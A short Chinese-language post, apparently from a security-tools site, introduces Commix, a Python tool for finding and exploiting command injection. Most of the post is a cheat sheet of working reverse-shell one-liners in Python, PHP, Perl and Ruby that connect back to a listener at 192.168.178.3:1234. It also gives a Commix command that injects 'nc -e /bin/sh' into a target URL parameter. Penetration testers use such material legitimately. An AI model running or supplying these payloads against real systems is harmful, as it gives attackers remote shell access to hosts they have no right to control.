项目首页:
https://github.com/stasinopoulos/commix 项目简介:
Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。
在作者所写的使用案例中还附送了一些反弹shell的技巧,如下: 1. Python-reverse-shell:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”192.168.178.3\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);’
2. PHP-reverse-shell:
php -r ‘\$sock=fsockopen(\”192.168.178.3\”,1234);exec(\”/bin/sh -i <%263 >%263 2>%263\”);’
3. Perl-reverse-shell:
perl -e ‘use Socket;\$i=\”192.168.178.3\”;\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\”tcp\”));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\”>%26S\”);open(STDOUT,\”>%26S\”);open(STDERR,\”>%26S\”);exec(\”/bin/sh -i\”);};’
4. Ruby-reverse-shell:
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(\”192.168.178.3\”,1234);while(cmd=c.gets);IO.popen(cmd,\”r\”){|io|c.print io.read}end’ 使用方法:
root@kali:~/commix# python commix.py –url=”http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE” –os-cmd=”nc -e /bin/sh 192.168.178.3 1234″
对于具体的测试方法与利用模块的开发可以去其github进行阅读。 [url=http://tools.pwn.ren/wp-content/uploads/2016/01/image.jpeg][/url]
|